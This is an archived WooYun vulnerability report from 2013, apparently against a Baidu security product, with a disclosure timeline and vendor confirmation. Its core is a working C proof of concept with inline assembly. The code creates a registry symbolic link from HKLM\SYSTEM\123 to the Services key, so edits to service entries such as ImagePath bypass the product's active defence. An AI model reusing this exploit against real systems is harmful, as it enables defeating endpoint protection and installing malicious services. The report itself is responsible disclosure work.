乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-10: 细节已通知厂商并且等待厂商处理中 2013-09-10: 厂商已经确认,细节仅向厂商公开 2013-09-13: 细节向第三方安全合作伙伴开放 2013-11-04: 细节向核心白帽子及相关领域专家公开 2013-11-14: 细节向普通白帽子公开 2013-11-24: 细节向实习白帽子公开 2013-12-09: 细节向公众公开
礼物收到了,感谢。最后一次了,不研究了.
标题是迷惑人的,其实是任意写注册表。再次利用硬链接,POC执行以后操作HKEY_LOCAL_MACHINE\SYSTEM\123就等于操作HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\poc(这个是原始存在的)了,而操作HKEY_LOCAL_MACHINE\SYSTEM\123主动防御是不拦截的,修改下ImagePath就又回到全bypass的原点了.
typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; #define InitializeObjectAttributes( p, n, a, r, s ) { (p)->Length = sizeof( OBJECT_ATTRIBUTES );(p)->RootDirectory = r; (p)->Attributes = a;(p)->ObjectName = n;(p)->SecurityDescriptor = s;(p)->SecurityQualityOfService = NULL; }BOOL RegHardLink(){ BOOL bRet = FALSE; HMODULE hLib = NULL; WCHAR KeyName1[] = L"\\Registry\\Machine\\System\\123"; LPCWSTR pKeyName1 = KeyName1 ; UNICODE_STRING KeyString ; OBJECT_ATTRIBUTES oba ; PVOID pZwCreateKey = NULL ,pZwSetValueKey = NULL ,pRtlInitUnicodeString = NULL; do { hLib = LoadLibrary("ntdll.dll"); if(!hLib) break; pRtlInitUnicodeString = GetProcAddress(hLib , "RtlInitUnicodeString"); pZwCreateKey = GetProcAddress(hLib , "ZwCreateKey"); pZwSetValueKey = GetProcAddress(hLib , "ZwSetValueKey"); if(!pRtlInitUnicodeString || !pZwCreateKey || !pZwSetValueKey) break; __asm { push pKeyName1 lea eax , KeyString push eax call pRtlInitUnicodeString } InitializeObjectAttributes(&oba , &KeyString , 0X40 , 0 ,0 ); ULONG dispostion ; HANDLE linkhandle ; LONG stat ; __asm { lea eax , dispostion push eax push 3 push 0 push 0 lea eax , oba push eax push 0x22 lea eax , linkhandle push eax call pZwCreateKey mov stat ,eax } WCHAR KeyName2[] = L"\\Registry\\Machine\\System\\CurrentControlSet\\Services"; PVOID pdata = KeyName2 ; ULONG len = wcslen(KeyName2) * sizeof(WCHAR); WCHAR ValueName[]= L"SymbolicLinkValue"; LPCWSTR pvaluename = ValueName ; UNICODE_STRING valuestring ; __asm { push pvaluename lea eax , valuestring push eax call pRtlInitUnicodeString } __asm { push len push pdata push 6 push 0 lea eax , valuestring push eax push linkhandle call pZwSetValueKey mov stat ,eax } }while(0); if(hLib) FreeLibrary(hLib); return bRet;}int main(int argc, char* argv[]){ RegHardLink(); return 0;}
试了就知道
他们懂
危害等级:高
漏洞Rank:15
确认时间:2013-09-10 15:41
感谢对百度安全的关注,我们已经开始进行修复,欢迎继续关注百度安全。--“百度,因你更安全”
暂无